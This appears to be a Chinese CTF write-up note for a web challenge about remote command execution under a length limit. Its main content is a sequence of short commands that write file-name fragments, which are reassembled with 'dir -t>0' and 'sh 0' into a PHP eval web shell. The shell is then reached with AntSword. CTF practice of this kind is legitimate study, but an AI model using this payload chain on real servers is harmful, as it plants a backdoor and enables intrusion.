Web/7️⃣ EZRCCCCE

https://www.cnblogs.com/pursue-security/p/15403906.html
http://arsenetang.com/2021/07/20/RCE篇之命令执行中的各种绕过/
https://blog.csdn.net/q20010619/article/details/109206728
RCE长度限制解决思路
VBS显示回显，这个用不到，但是先存着
 linux ls及其参数

小括号也要转义，这里修改一下，2，7行小括号前面加
>?\>\\
>\);\\
>1]\\
>T[\\
>GE\\
>$_\\
>l$\\
>va\\
> e\\
>hp\\
>?p\\
>\<\\
dir -t>0
sh 0
dir目录后发现好像有总文件个数限制
修改一下
内容也改成了><?php @eval($_POST[1]); ?>
> ?\> #这里去掉\\就行
>$;\\
>1]\\
>T[\\
>POS\\
>\$_\\
>l\(\\
>eva\\
>p @\\
>?ph\\
>\<\\
dir -t>0
sh 0
长度设置有问题，改成这样了
家人们谁懂啊下头蚁剑，原来是因为设置代理进不去害我折磨一个小时，甚至重装了一遍antswords还觉得是科学下网的问题
关闭蚁剑代理解决报错

更崩溃了，又试了好几次原来是下头火绒全给我拦截了,找火绒要文件去（咬牙切齿）
嗯嗯。。还是有问题要改进
要把文件写到php文件里面所以内容，而且dir -t >1.php长度也超了，还得调整，比如把这两句也写到文件再sh 0生成php